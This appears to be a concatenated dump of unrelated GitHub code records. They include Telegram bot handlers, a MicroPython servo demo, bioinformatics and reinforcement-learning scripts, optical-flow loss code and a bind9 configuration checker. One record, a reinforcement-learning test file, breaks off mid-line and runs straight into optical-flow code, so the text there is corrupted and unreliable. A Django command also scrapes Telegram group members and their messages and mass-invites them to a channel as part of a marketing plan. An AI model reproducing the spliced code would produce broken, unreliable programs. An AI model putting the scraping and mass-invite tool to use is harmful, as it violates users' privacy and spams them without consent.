InlineKeyboardMarkup(btns)\n\t\t\t\t\t\tbot.send_message(uid, \"En cual de estos grupos queres mandar la referencia?\", reply_markup=btnMarkup)\n\t\t\t\telse:\n\t\t\t\t\tmensaje_error = \"No hay partidas en las que puedas hacer /code\"\n\t\t\t\t\tbot.send_message(uid, mensaje_error)\n\t\t\telse:\n\t\t\t\tmensaje_error = \"Debes poner 3 pistas, recuerda que cada uno se separa por coma (,) EJ: PISTA 1, *ONOMATOPEYA4*, FRASE FRASE 2\"\n\t\t\t\tbot.send_message(uid, mensaje_error)\n\n\texcept Exception as e:\n\t\tbot.send_message(uid, str(e))\n\t\tlog.error(\"Unknown error: \" + str(e))\n\ndef command_intercept(update: Update, context: CallbackContext):\n\tbot = context.bot\n\targs = context.args\n\tuser_data = context.user_data\n\ttry:\n\t\tcid = update.message.chat_id\n\t\tuid = update.message.from_user.id\n\t\t\n\t\tif update.message.chat.type in ['group', 'supergroup']:\n\t\t\tbot.delete_message(cid, 
update.message.message_id)\n\t\t\treturn\n\t\t\n\t\tif len(args) > 0:\n\t\t\t# Obtengo todos los juegos de base de datos de los que usan clue\n\t\t\tmensaje_error = \"\"\t\t\t\n\t\t\tgames_tipo = MainController.getGamesByTipo('Decrypt')\t\t\t\t\t\t\n\t\t\t\n\t\t\tbtns, cid = get_choose_game_buttons(games_tipo, uid, fase_actual = 'Intercept/Decrypt', \n\t\t\t\t\t\t\t\t\t\t\tcommando_origen = 'intercept', callback_command = 'choosegameintDE')\n\n\t\t\tuser_data[uid] = ' '.join(args)\n\t\t\t\n\t\t\tif len(btns) != 0:\n\t\t\t\tif len(btns) == 0:\n\t\t\t\t\t#Si es solo 1 juego lo hago automatico\n\t\t\t\t\tgame = get_game(cid)\n\t\t\t\t\tadd_intercept(bot, game, uid, ' '.join(args))\n\t\t\t\telse:\n\t\t\t\t\ttxtBoton = \"Cancel\"\n\t\t\t\t\tdatos = \"-1*choosegameintDE*\" + \"prop\" + \"*\" + str(uid)\n\t\t\t\t\tbtns.append([InlineKeyboardButton(txtBoton, callback_data=datos)])\n\t\t\t\t\tbtnMarkup = InlineKeyboardMarkup(btns)\n\t\t\t\t\tbot.send_message(uid, \"En cual de estos grupos la intercepción?\", reply_markup=btnMarkup)\n\t\t\telse:\n\t\t\t\tmensaje_error = \"No hay partidas en las que puedas hacer /intercept\"\n\t\t\t\tbot.send_message(uid, mensaje_error)\n\texcept Exception as e:\n\t\tbot.send_message(uid, str(e))\n\t\tlog.error(\"Unknown error: \" + str(e))\n\ndef command_decrypt(update: Update, context: CallbackContext):\n\tbot = context.bot\n\targs = context.args\n\tuser_data = context.user_data\n\ttry:\n\t\tcid = update.message.chat_id\n\t\tuid = update.message.from_user.id\n\t\t\n\t\tif update.message.chat.type in ['group', 'supergroup']:\n\t\t\tbot.delete_message(cid, update.message.message_id)\n\t\t\treturn\n\t\t\n\t\tif len(args) > 0:\n\t\t\t# Obtengo todos los juegos de base de datos de los que usan clue\n\t\t\tmensaje_error = \"\"\t\t\t\n\t\t\tgames_tipo = MainController.getGamesByTipo('Decrypt')\t\t\t\t\t\t\n\t\t\t\n\t\t\tbtns, cid = get_choose_game_buttons(games_tipo, uid, fase_actual = 'Intercept/Decrypt', \n\t\t\t\t\t\t\t\t\t\t\t\tcommando_origen = 'decrypt', callback_command = 'choosegamedecDE')\n\n\t\t\tuser_data[uid] = ' '.join(args)\n\t\t\t\n\t\t\tif len(btns) != 0:\n\t\t\t\tif len(btns) == 0:\n\t\t\t\t\t#Si es solo 1 juego lo hago automatico\n\t\t\t\t\tgame = get_game(cid)\n\t\t\t\t\tadd_decrypt(bot, game, uid, ' '.join(args))\n\t\t\t\telse:\n\t\t\t\t\ttxtBoton = \"Cancel\"\n\t\t\t\t\tdatos = \"-1*choosegamedecDE*\" + \"prop\" + \"*\" + str(uid)\n\t\t\t\t\tbtns.append([InlineKeyboardButton(txtBoton, callback_data=datos)])\n\t\t\t\t\tbtnMarkup = InlineKeyboardMarkup(btns)\n\t\t\t\t\tbot.send_message(uid, \"En cual de estos grupo realizas la desencripción?\", reply_markup=btnMarkup)\n\t\t\telse:\n\t\t\t\tmensaje_error = \"No hay partidas en las que puedas hacer /decrypt\"\n\t\t\t\tbot.send_message(uid, mensaje_error)\n\texcept Exception as e:\n\t\tbot.send_message(uid, str(e))\n\t\tlog.error(\"Unknown error: \" + str(e))\n\t\traise e\n\t\t\n","repo_name":"leviatas/MultigamesV2","sub_path":"Decrypt/Commands.py","file_name":"Commands.py","file_ext":"py","file_size_in_byte":14398,"program_lang":"python","lang":"es","doc_type":"code","stars":2,"dataset":"github-code","pt":"67"} +{"seq_id":"28421438789","text":"'''\n实验名称:舵机(Servo)-180°\n版本:v1.0\n日期:2021.1\n作者:01Studio\n说明:控制舵机旋转不同角度。\n'''\n\nfrom machine import Pin, PWM\nimport time\n\nS1 = PWM(Pin(0)) # Servo1的引脚是0\nS1.freq(50) #舵机控制信号频率\n\n'''\n说明:舵机控制函数\n功能:180度舵机:angle:-90至90 表示相应的角度\n 360连续旋转度舵机:angle:-90至90 旋转方向和速度值。\n'''\ndef Servo(servo,angle):\n a = int(((angle+90)*2/180+0.5)/20*65535)\n print(a)\n 
servo.duty_u16(a) #使用传入的servo参数,而不是全局的S1\n\nwhile True:\n \n #-90度\n Servo(S1,-90)\n time.sleep(1)\n\n #-45度\n Servo(S1,-45)\n time.sleep(1)\n\n #0度\n Servo(S1,0)\n time.sleep(1)\n\n #45度\n Servo(S1,45)\n time.sleep(1)\n\n #90度\n Servo(S1,90)\n time.sleep(1)","repo_name":"01studio-lab/MicroPython_Examples","sub_path":"pyPico/3.拓展实验/1.舵机/180度舵机/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":782,"program_lang":"python","lang":"zh","doc_type":"code","stars":107,"dataset":"github-code","pt":"67"}
+{"seq_id":"25797752599","text":"from time import time\n\nstart = time()\n\nwith open(r\"c:\\git\\kodekalendere\\knowit\\dag21\\generations.txt\", 'r') as f: \n generasjoner = f.read().splitlines()\n generasjoner = [ [ tuple( int(i) for i in a.split(',')) for a in g.split(';') ] for g in generasjoner ]\n\ndef solve(generasjoner):\n\n antall_alver = len(generasjoner[0])\n sets = [set([i]) if i % 2 else set([]) for i in range(antall_alver)]\n\n for gn, g in enumerate(generasjoner,1):\n \n newset = [ set([]) for i in range(antall_alver)]\n \n for i,(a,b) in enumerate(g):\n newset[a] = newset[a].union(sets[i]) \n newset[b] = newset[b].union(sets[i])\n\n if 2**(gn+1) >= antall_alver//2:\n for alv, s in enumerate(newset):\n if len(s) == antall_alver//2:\n return f\"{gn}:{alv} er løsningen.\"\n\n sets = newset\n \nprint(solve(generasjoner))\nprint( time() - start )","repo_name":"Armcollector/kodekalendere","sub_path":"knowit/Dag21/knowit21.py","file_name":"knowit21.py","file_ext":"py","file_size_in_byte":936,"program_lang":"python","lang":"no","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"}
+{"seq_id":"69941969173","text":"#!/mnt/grl/software/epd/bin/python\n'''\nformat DGE results\n'''\n__author__ = \"Xiaoyu Liu\"\n__email__ = \"liux@nbio.info\"\n__copyright__ = \"Copyright (C) 2016 Xiaoyu Liu\"\n__status__ = \"development\"\n__license__ = \"Public Domain\"\n__version__ = \"0.2b\"\n\nimport os, sys, json\nimport pandas as pd\n\ndef save_gene_table(config_fn, fc_file):\n config = json.loads(open(config_fn, 'r').read())\n exp, ctrl = os.path.basename(fc_file).split(\".\")[0].split(\"_vs_\")\n feature = os.path.basename(fc_file).split(\".\")[1].split(\"_\")[0]\n w_dir = config['workdir']\n tpm = None\n for s in config[\"treatments\"][exp]+config[\"treatments\"][ctrl]:\n exp_fn = \"{d}/expression/{s}_{f}_table.txt\".format(d=w_dir, s=s, f=feature)\n df = pd.read_table(exp_fn, index_col = [0])\n if tpm is None: # get the first samples expression value\n tpm = df[[\"TPM\"]]\n tpm.columns = [s]\n continue\n # add the TPM value to the table\n tpm[s] = df[[\"TPM\"]]\n # avg expression, fold change, and p_value\n df = pd.read_table(fc_file, index_col=[0])\n tpm=tpm.loc[df.index] # .loc replaces the removed DataFrame.ix for label-based indexing\n \n # add average expression to the table\n tpm[\"avg\"] = tpm.mean(axis=1)\n \n tpm['p-value'] = 1-df.PPDE\n tpm['Fold Change'] = df.RealFC.apply(lambda x: x if x >= 1 else -1/x ) # change fc <1 to negative number\n \n tpm.to_csv(sys.stdout, sep=\"\\t\", float_format='%.2f')\n\nif __name__ == \"__main__\":\n if len(sys.argv) >= 3:\n save_gene_table(sys.argv[1], sys.argv[2])\n else:\n print(\"Usage: {} config_file fold_change_file\".format(sys.argv[0]))\n","repo_name":"yxuil/nbio_mrnaseq","sub_path":"modules/EBseq/format_rsem_results.py","file_name":"format_rsem_results.py","file_ext":"py","file_size_in_byte":1578,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"}
+{"seq_id":"26351201270","text":"import unittest\n\nimport numpy as np\n\nfrom rl.playground import grid_system\n\nN = 
1000\n\n\nclass MyTestCase(unittest.TestCase):\n\n def test_single(self):\n gvf = grid_system.GridValueFunction()\n\n state = np.zeros((1, 64))\n values = gvf.get_value(state)\n\n self.assertEqual((1, 4), values.shape)\n print(values)\n\n def test_multi(self):\n gvf = grid_system.GridValueFunction()\n\n state = np.zeros((2, 64))\n values = gvf.get_value(state)\n\n print(values)\n\n def test_generate_action_target_values(self):\n\n grid_sys = grid_system.GridSystem()\n grid_sys.initialise_value_function(epochs=10)\n\n states, action_rewards, new_states = grid_sys.generate_experience(num_epochs=10)\n\n new_state_values = grid_sys.generate_action_target_values(new_states)\n\n N = len(new_state_values)\n expected = np.ndarray((N, grid_sys.num_actions))\n for i in range(N):\n for action in range(grid_sys.num_actions):\n action_values = grid_sys.value_function.get_value(new_states[i][action].reshape(1, grid_sys.state_size))\n expected[i, action] = action_values.max()\n\n np.testing.assert_almost_equal(expected, new_state_values)\n\n def test_initialise_value_function(self):\n grid_sys = grid_system.GridSystem()\n grid_sys.initialise_value_function(100)\n\n fixed_grid_state = grid_system.new_fixed_grid_state()\n value_grid = grid_sys.get_value_grid(fixed_grid_state)\n self.assertTrue(5.0 < value_grid[2, 3] < 15.0)\n\n def test_generate_experience(self):\n\n grid_sys = grid_system.GridSystem()\n states, action_rewards, new_states, new_states_terminal = grid_sys.experience_generator.generate_experience(num_epochs=100)\n\n self.assertTrue(states.shape[0]>100)\n\n state = grid_system.new_fixed_grid_state()\n state.update_player((1, 3))\n\n print(states)\n\n self.assertIn(state.as_vector(), states)\n\n matches = np.where(np.all(states == state.as_vector(), axis=1))[0]\n\n match = matches[0]\n\n np.testing.assert_array_almost_equal(np.array([-1., -1., -1., -1.]), action_rewards[match])\n\n action_targets = grid_sys.generate_action_target_values(new_states)[match]\n # We should be training this value towards 10.0\n self.assertGreater(action_targets[1], 5)\n\n\n\n\n #\n # def test_init_grid(self):\n # grid = rle.init_grid()\n # self.assertEqual((0, 1), grid.player)\n # self.assertEqual((2, 2), grid.wall)\n # self.assertEqual((3, 3), grid.goal)\n # self.assertEqual((3, 3), grid.goal)\n #\n # def test_as_one_hot(self):\n # grid = rle.init_grid()\n # vec = grid.as_one_hot()\n #\n # self.assertIsInstance(vec, np.ndarray)\n # self.assertEqual(64, vec.shape[0])\n # self.assertTrue(vec[1]) # Player\n # self.assertTrue(vec[26]) # Wall\n # self.assertTrue(vec[37]) # Pit\n # self.assertTrue(vec[63]) # Goal\n #\n # def test_as_2d_array(self):\n #\n # grid = rle.init_grid()\n #\n # actual = grid.as_2d_array()\n #\n # expected = np.empty((4, 4), dtype=' 0:\n scaled_flow_gt = scaled_flow_gt - F.interpolate(ms_flow_pred[l-1], scale_factor=2, mode='bilinear', align_corners=True, recompute_scale_factor=True)\n scaled_flow_gt = scaled_flow_gt / 2**(self.ds-l)\n\n scaled_flow_distribution = vector2density(scaled_flow_gt, self.corr_range[l]) * valid_mask\n kld_loss += 4**(self.ds-l) / (H * W) * criterion(F.log_softmax(ms_flow_prob[l], dim=1), scaled_flow_distribution.detach())\n\n losses['total'] = kld_loss\n for loss_type, loss_value in losses.items():\n losses[loss_type] = loss_value.reshape(1)\n return losses\n\n\nclass OpticalFlowLossMFN:\n def __init__(self, scales, weights, match=\"upsampling\", eps=1e-8, q=None):\n self.scales = scales\n self.weights = weights\n self.match = match\n self.eps = eps\n self.q = q\n\n 
self.ms_epe = MultiScaleEPELoss(self.scales, self.weights, self.match, self.eps, self.q)\n\n def __call__(self, flow_pred_list, flow_gt, mask):\n losses = {}\n ms_epe_loss = self.ms_epe(flow_pred_list, flow_gt, mask)\n\n losses['total'] = ms_epe_loss\n # print(ms_epe_loss)\n # for loss_type, loss_value in losses.items():\n # losses[loss_type] = loss_value.reshape(1)\n return losses\n\n\nclass OpticalFlowLossMFNInstance:\n def __init__(self, scales, weights, match=\"upsampling\", eps=1e-8, q=None):\n self.scales = scales\n self.weights = weights\n self.match = match\n self.eps = eps\n self.q = q\n\n self.ms_epe = MultiScaleEPELoss(self.scales, self.weights, self.match, self.eps, self.q)\n\n def __call__(self, flow_pred_list, flow_gt, mask, reproj_loss):\n losses = {}\n ms_epe_loss = self.ms_epe(flow_pred_list, flow_gt, mask)\n\n losses[\"pose_error\"] = reproj_loss['pose_error']\n # losses['reproj_pnp_gt'] = reproj_loss[\"pnp_gt\"]\n # losses['reproj_pnp_pred'] = reproj_loss[\"pnp_pred\"]\n\n losses['total'] = ms_epe_loss + (reproj_loss['pose_error'])\n\n\n # print(ms_epe_loss)\n # for loss_type, loss_value in losses.items():\n # losses[loss_type] = loss_value.reshape(1)\n return losses\n\n\nclass EPELossWithMask:\n def __init__(self, eps=1e-8, q=None):\n super(EPELossWithMask, self).__init__()\n self.eps = eps\n self.q = q\n\n def __call__(self, flow_pred, flow_gt, mask):\n # flow_pred = flow_pred[mask]\n # flow_gt = flow_gt[mask]\n # print(torch.min(mask), torch.max(mask))\n nan_count = torch.sum(flow_pred != flow_pred)\n if nan_count > 0:\n print(\"NAN FOUND!: {}\".format(nan_count))\n\n if self.q is not None:\n loss = ((flow_pred - flow_gt).abs().sum(1) + self.eps) ** self.q\n else:\n loss = ((flow_pred - flow_gt).pow(2).sum(1) + self.eps).sqrt()\n loss = loss * mask.squeeze(1)\n loss = loss.view(loss.shape[0], -1).sum(1) / mask.view(mask.shape[0], -1).sum(1)\n\n loss[loss != loss] = 0.\n\n return loss\n\n\nclass EPELoss:\n def __init__(self, eps=0):\n super(EPELoss, self).__init__()\n self.eps = eps\n\n def __call__(self, flow_pred, flow_gt):\n loss = ((flow_pred - flow_gt).pow(2).sum(1) + self.eps).sqrt()\n return loss.view(loss.shape[0], -1).mean(1)\n\n\nclass MultiScaleEPELoss:\n def __init__(self, scales, weights, match, eps=1e-8, q=None):\n super(MultiScaleEPELoss, self).__init__()\n self.scales = scales\n self.weights = weights\n self.match = match\n self.eps = eps\n self.q = q\n\n # self.epe_loss_with_mask = EPELossWithMask(eps=self.eps, q=self.q)\n\n def __call__(self, flow_pred_list, flow_gt, mask):\n losses = 0\n\n if self.match == \"upsampling\":\n for pred_level, weight_level, scale_level in zip(flow_pred_list, self.weights, self.scales):\n losses += EPELossWithMask(eps=self.eps, q=self.q)(Upsample(pred_level, scale_level), flow_gt, mask) * weight_level\n # losses += self.epe_loss_with_mask(Upsample(pred_level, scale_level), flow_gt, mask) * weight_level\n else:\n raise NotImplementedError\n\n return losses\n\ndef EndPointError(output, gt):\n # output: [B, 1/2, H, W], stereo or flow prediction\n # gt: [B, C, H, W], 2D ground-truth annotation which may contain a mask\n # NOTE: To benchmark the result, please ensure the ground-truth keeps\n # its ORIGINAL RESOLUTION.\n output = resize_dense_vector(output, gt.size(2), gt.size(3))\n error = torch.norm(output - gt[:, :2, :, :], 2, 1, keepdim=False)\n if gt.size(1) == 3:\n mask = (gt[:, 2, :, :] > 0).float()\n else:\n mask = torch.ones_like(error)\n epe = (error * mask).sum() / mask.sum()\n return epe.reshape(1)\n\nclass 
OpticalFlowLossRAFT:\n def __init__(self, max_flow=400, gamma=0.8, eps=1e-8):\n super(OpticalFlowLossRAFT, self).__init__()\n self.eps = eps\n self.max_flow = max_flow\n self.gamma = gamma\n\n def __call__(self, flow_pred_iter, flow_gt, valid_mask):\n losses = {}\n\n flow_gt, _ = pad_packed_images(flow_gt)\n valid_mask, _ = pad_packed_images(valid_mask)\n\n # Check for nan in predictions\n nan_count = 0\n for i in range(len(flow_pred_iter)):\n nan_count = nan_count + torch.sum(flow_pred_iter[i] != flow_pred_iter[i])\n if nan_count > 0:\n print(\"NAN FOUND!: {}\".format(nan_count))\n\n # Remove the invalid pixels and the pixels with large displacements\n # mag = torch.sum(flow_gt ** 2, dim=1).sqrt().unsqueeze(1)\n # valid_mask = valid_mask & (mag < self.max_flow)\n\n flow_seq_loss = self.computeSequenceLoss(flow_pred_iter, flow_gt, valid_mask)\n # flow_edge_loss = self.computePanopticEdgeLoss(flow_pred_iter, flow_gt, valid_mask, po_mask)\n\n losses['total'] = flow_seq_loss\n\n return losses\n\n def computeSequenceLoss(self, flow_pred_iter, flow_gt, valid_mask):\n num_preds = len(flow_pred_iter)\n flow_loss = 0.0\n for i in range(num_preds):\n i_weight = self.gamma ** (num_preds - i - 1)\n i_loss = (flow_pred_iter[i] - flow_gt).abs()\n flow_loss += i_weight * (valid_mask * i_loss).mean()\n\n return flow_loss\n\n def computeInstanceEdgeLoss(self, flow_pred_iter, flow_gt, valid_mask, po_mask):\n # Get the instance outline mask\n inst_edge_map, grad_x, grad_y, grad_mag = self.computeInstanceEdgeMap(po_mask)\n\n # Sample points from the instance edges and neighbouring points\n inst_edge_points = torch.nonzero(inst_edge_map, as_tuple=True)\n points_a, points_b = self.getNeighbourhoodPointPairs(inst_edge_map, inst_edge_points, grad_x, grad_y, grad_mag)\n\n # Remove samples where the GT is not valid --> valid_mask = False\n points_valid = valid_mask[points_a] & valid_mask[points_b]\n points_a_valid = (points_a[0][points_valid], points_a[1][points_valid], points_a[2][points_valid], points_a[3][points_valid])\n points_b_valid = (points_b[0][points_valid], points_b[1][points_valid], points_b[2][points_valid], points_b[3][points_valid])\n\n # Handle the case when the valid mask has no valid points\n if points_a_valid[0].shape[0] == 0:\n return torch.tensor(0.).to(flow_gt.device)\n\n # Sample the indices from the set of points\n sampled_indices = torch.randint(0, points_a_valid[0].shape[0], (inst_edge_points[0].shape))\n points_a_sampled = (points_a_valid[0][sampled_indices], points_a_valid[1][sampled_indices], points_a_valid[2][sampled_indices], points_a_valid[3][sampled_indices])\n points_b_sampled = (points_b_valid[0][sampled_indices], points_b_valid[1][sampled_indices], points_b_valid[2][sampled_indices], points_b_valid[3][sampled_indices])\n\n # Compute the edge loss\n inst_edge_loss = self.computePairwiseLoss(flow_pred_iter, flow_gt, points_a_sampled, points_b_sampled)\n\n return inst_edge_loss\n\n def computeInstanceEdgeMap(self, po_mask):\n # Apply Sobel filter to get the X and Y gradients\n grad_x, grad_y = self.computeGradient(po_mask)\n grad_mag = torch.sqrt(grad_x.pow(2) + grad_y.pow(2))\n\n # Compute the instance edge map\n B, C, H, W = po_mask.shape\n inst_edge_map = torch.zeros((B, C, H, W), dtype=torch.bool).to(po_mask.device)\n for b in range(inst_edge_map.shape[0]):\n inst_edge_map[b, :, :, :] = grad_mag[b, :, :, :] > 0.5 # This implies change of label.\n\n # Zero out the edges of the image to prevent computation wastage\n inst_edge_map[b, :, :11, :] = 0\n inst_edge_map[b, :, H - 10:, 
:] = 0\n inst_edge_map[b, :, :, :11] = 0\n inst_edge_map[b, :, :, W - 10:] = 0\n\n return inst_edge_map, grad_x, grad_y, grad_mag\n\n def computeGradient(self, depth_pred):\n _, C, _, _ = depth_pred.shape\n\n grad_x_wts = torch.nn.Parameter(torch.tensor(self.sobel_x, dtype=torch.float32, requires_grad=False).expand(1, C // 1, 3, 3).to(depth_pred.device)) # (out_ch, in_ch // groups, H_K, W_K)\n grad_y_wts = torch.nn.Parameter(torch.tensor(self.sobel_y, dtype=torch.float32, requires_grad=False).expand(1, C // 1, 3, 3).to(depth_pred.device)) # (out_ch, in_ch // groups, H_K, W_K)\n sobel_conv_x = nn.Conv2d(1, 1, 3, 1, 1, padding_mode=\"replicate\").to(depth_pred.device)\n sobel_conv_y = nn.Conv2d(1, 1, 3, 1, 1, padding_mode=\"replicate\").to(depth_pred.device)\n sobel_conv_x.weight = grad_x_wts\n sobel_conv_y.weight = grad_y_wts\n\n grad_x = sobel_conv_x(depth_pred)\n grad_y = sobel_conv_y(depth_pred)\n\n return grad_x, grad_y\n\n def getNeighbourhoodPointPairs(self, edge_map, edge_points, grad_x, grad_y, grad_mag):\n points_count = edge_points[0].shape[0]\n H_min = 0\n H_max = edge_map.shape[2] - 1\n W_min = 0\n W_max = edge_map.shape[3] - 1\n\n batch = edge_points[0]\n channel = edge_points[1]\n edge_points_x = edge_points[2]\n edge_points_y = edge_points[3]\n\n edge_x_samp_a = torch.zeros((4 * points_count), dtype=torch.long).to(edge_map.device)\n edge_y_samp_a = torch.zeros((4 * points_count), dtype=torch.long).to(edge_map.device)\n edge_x_samp_b = torch.zeros((4 * points_count), dtype=torch.long).to(edge_map.device)\n edge_y_samp_b = torch.zeros((4 * points_count), dtype=torch.long).to(edge_map.device)\n\n delta_a = torch.randint(-self.nbd_max_limit, -self.nbd_min_limit, torch.Size([points_count]), device=edge_map.device).unsqueeze(0)\n delta_b = torch.randint(-self.nbd_max_limit, -self.nbd_min_limit, torch.Size([points_count]), device=edge_map.device).unsqueeze(0)\n delta_c = torch.randint(self.nbd_min_limit, self.nbd_max_limit, torch.Size([points_count]), device=edge_map.device).unsqueeze(0)\n delta_d = torch.randint(self.nbd_min_limit, self.nbd_max_limit, torch.Size([points_count]), device=edge_map.device).unsqueeze(0)\n delta = torch.cat([delta_a, delta_b, delta_c, delta_d], dim=0)\n\n batch_repeat = torch.repeat_interleave(batch, repeats=delta.shape[0], dim=0)\n channel_repeat = torch.repeat_interleave(channel, repeats=delta.shape[0], dim=0)\n batch_samp_a = batch_repeat\n ch_samp_a = channel_repeat\n batch_samp_b = batch_repeat\n ch_samp_b = channel_repeat\n\n grad_mag_pts = grad_mag[batch, channel, edge_points_x, edge_points_y]\n grad_x_pts = grad_x[batch, channel, edge_points_x, edge_points_y]\n grad_y_pts = grad_y[batch, channel, edge_points_x, edge_points_y]\n for sp_idx in range(delta.shape[0]):\n x_sample = edge_points_x + (delta[sp_idx] * grad_x_pts / grad_mag_pts).type(torch.long)\n y_sample = edge_points_y + (delta[sp_idx] * grad_y_pts / grad_mag_pts).type(torch.long)\n\n # Clamp the range of the indices\n x_sample[x_sample < H_min] = H_min\n x_sample[x_sample > H_max] = H_max\n y_sample[y_sample < W_min] = W_min\n y_sample[y_sample > W_max] = W_max\n\n sp_indices = torch.arange(0, 4 * points_count)\n\n edge_x_samp_a[(sp_indices % delta.shape[0]) == sp_idx] = x_sample\n edge_y_samp_a[(sp_indices % delta.shape[0]) == sp_idx] = y_sample\n\n edge_x_samp_b[(sp_indices % delta.shape[0]) == ((sp_idx + (delta.shape[0] - 1)) % delta.shape[0])] = x_sample\n edge_y_samp_b[(sp_indices % delta.shape[0]) == ((sp_idx + (delta.shape[0] - 1)) % delta.shape[0])] = y_sample\n\n return 
(batch_samp_a, ch_samp_a, edge_x_samp_a, edge_y_samp_a), (batch_samp_b, ch_samp_b, edge_x_samp_b, edge_y_samp_b)\n\n def computePairwiseLoss(self, flow_pred_iter, flow_gt, points_a_sampled, points_b_sampled):\n edge_loss = 0.0\n num_preds = len(flow_pred_iter)\n\n # Define the common tensors outside\n plusone_tensor = torch.ones_like(flow_gt)\n minusone_tensor = torch.ones_like(flow_gt) * -1\n zero_tensor = torch.zeros_like(flow_gt)\n\n for i in range(num_preds):\n i_weight = self.gamma ** (num_preds - i - 1)\n\n flow_pred_a = flow_pred_iter[i][points_a_sampled]\n flow_pred_b = flow_pred_iter[i][points_b_sampled]\n flow_gt_a = flow_gt[points_a_sampled]\n flow_gt_b = flow_gt[points_b_sampled]\n\n plusone_condition = flow_gt_a / flow_gt_b >= 1 + self.pointwise_thresh\n minusone_condition = flow_gt_a / flow_gt_b <= 1 / (1 + self.pointwise_thresh)\n l = torch.where(plusone_condition, plusone_tensor, torch.where(minusone_condition, minusone_tensor, zero_tensor))\n\n pairwise_loss = torch.where(l == zero_tensor,\n (flow_pred_a - flow_pred_b).pow(2), # True\n torch.log(1 + torch.exp(-l * (flow_pred_a - flow_pred_b)))).mean()\n\n edge_loss += i_weight * pairwise_loss\n\n return edge_loss","repo_name":"cvcore/future-prediction","sub_path":"thirdparty/efficientPS/efficientPS/algos/optical_flow.py","file_name":"optical_flow.py","file_ext":"py","file_size_in_byte":19146,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"67"} +{"seq_id":"17942949912","text":"from django.core.management.base import BaseCommand\nfrom telethon.sync import TelegramClient\nfrom scraper.src import crawl\nfrom scraper.models import TelegramAccount\nfrom marketing.models import MarketingPlan\nfrom django.conf import settings\nfrom telethon.sessions import StringSession\n# from scraper.models import ScraperStatus\n# Import your scraping functions or classes here\n\nclass Command(BaseCommand):\n help = 'Scrape data and save in the database'\n\n def add_arguments(self, parser):\n parser.add_argument(\n '--conversation',\n action='store_true',\n help='Scrape Conversations(Groups and Private Chats)'\n )\n parser.add_argument(\n '--user',\n action='store_true',\n help='Scrape Users in Groups'\n )\n parser.add_argument(\n '--user_message',\n action='store_true',\n help='Scrape Users in SuperGroups With Message'\n )\n parser.add_argument(\n '--check_deep_crawl',\n action='store_true',\n help='Check Deep Crawl Groups'\n )\n parser.add_argument(\n '--clean_db',\n action='store_true',\n help='Clean Database'\n )\n parser.add_argument(\n '--clean_channel',\n action='store_true',\n help='Clean Channel'\n )\n parser.add_argument(\n '--invite_user_to_group',\n action='store_true',\n help='Invite User To Group'\n )\n\n def handle(self, *args, **options):\n account = TelegramAccount.objects.filter()\n marketing_plan = MarketingPlan.objects.first()\n for acc in account:\n client = TelegramClient(StringSession(acc.session), acc.api_id, acc.api_hash)\n client.connect()\n if not client.is_user_authorized():\n client.send_code_request(acc.phone_number)\n client.sign_in(acc.phone_number, input('Enter the code: '))\n acc.session = StringSession.save(client.session)\n acc.save()\n\n if options['conversation']:\n self.stdout.write(self.style.SUCCESS('Start Scraping Conversations...'))\n crawl.get_conversations(client)\n elif options['user']:\n self.stdout.write(self.style.SUCCESS('Start Scraping Users in Groups...'))\n crawl.get_users_in_group(client)\n elif options['user_message']:\n 
self.stdout.write(self.style.SUCCESS('Start Scraping Users in SuperGroups With Message...'))\n crawl.get_users_in_group_with_message(client)\n elif options['clean_db']:\n self.stdout.write(self.style.SUCCESS('Start Cleaning Database Zero Member Group And Fake User...'))\n crawl.clean_db()\n elif options['clean_channel']:\n self.stdout.write(self.style.SUCCESS('Start Cleaning Channel...'))\n crawl.clean_channel(client)\n elif options['invite_user_to_group']:\n self.stdout.write(self.style.SUCCESS('Start Inviting Users To Group...'))\n crawl.invite_users_to_channel(client, marketing_plan)\n","repo_name":"itsmohsenjalali/telegram_scraper","sub_path":"scraper/management/commands/scrape.py","file_name":"scrape.py","file_ext":"py","file_size_in_byte":3229,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"71875893974","text":"import os\nfrom os import popen\nimport stat\nimport psutil\nimport grp\n\nfrom sv2.helpers import run_checkers\n\n\nsummary = \"Check bind9\"\n\nreport = None\n\n\nclass Bind9:\n\n def check_user(self):\n for process in psutil.process_iter():\n if process.name() == \"named\":\n if process.username() == \"root\":\n report.new_issue(\"Run bind9 with non-root user.\")\n\n def check_perms(self):\n binddir = os.stat(\"/etc/bind\")\n if binddir.st_uid != 0:\n report.new_issue(\"Owner of /etc/bind should be root.\")\n if grp.getgrgid(binddir.st_gid).gr_name != \"bind\":\n report.new_issue(\"Group of /etc/bind should be bind.\")\n perms = os.stat(\"/etc/bind\")\n if stat.filemode(perms.st_mode)[-1] != \"-\":\n report.new_issue(\"Users should have not access to /etc/bind\")\n\n def check_allow(self):\n with popen(\"/usr/bin/named-checkconf -p 2> /dev/null\") as p:\n conf = p.read()\n if \"allow-recursion\" not in conf:\n report.new_issue(\n \"Use allow-recursion to restric recursive queries to trusted clients.\")\n if \"allow-query\" not in conf:\n report.new_issue(\n \"Use allow-query to restric queries to trusted clients.\")\n if \"allow-transfer\" not in conf:\n report.new_issue(\n \"Use allow-transfer to restirct zone transfer to trusted hosts.\")\n\n\ndef run(r, opts):\n global report\n report = r\n c = Bind9()\n run_checkers(c, opts)\n\n\ndef makes_sense(r) -> bool:\n # We should extent the check to ensure that this is not another program\n # with the same name.\n for process in psutil.process_iter():\n if process.name() == \"named\":\n return True\n\n r.wont_run(\"Bind9 is not running\")\n return False\n","repo_name":"OSPG/sv2","sub_path":"sv2_checkers/bind9.py","file_name":"bind9.py","file_ext":"py","file_size_in_byte":1855,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"41008701987","text":"def check_number(array, index, n=25):\n if index <= 24:\n return False\n preamble = array[index - n:index]\n for i in preamble:\n if (array[index] - i) in preamble:\n if (i * 2 == array[index] and preamble.count(i) >= 2) or (i * 2 != array[index]):\n return True\n return False\n\nwith open('input.txt') as fin:\n numbers = [int(i.replace('\\n', '')) for i in fin.readlines()]\n\nfor i in range(25, len(numbers)):\n if not check_number(numbers, i):\n invalid_number = numbers[i]\n print(numbers[i])\n\nfor start in range(len(numbers) - 1):\n weakness = []\n for end in range(start + 1, len(numbers)):\n s = sum(numbers[start:end])\n if s < invalid_number:\n continue\n elif s == invalid_number:\n weakness 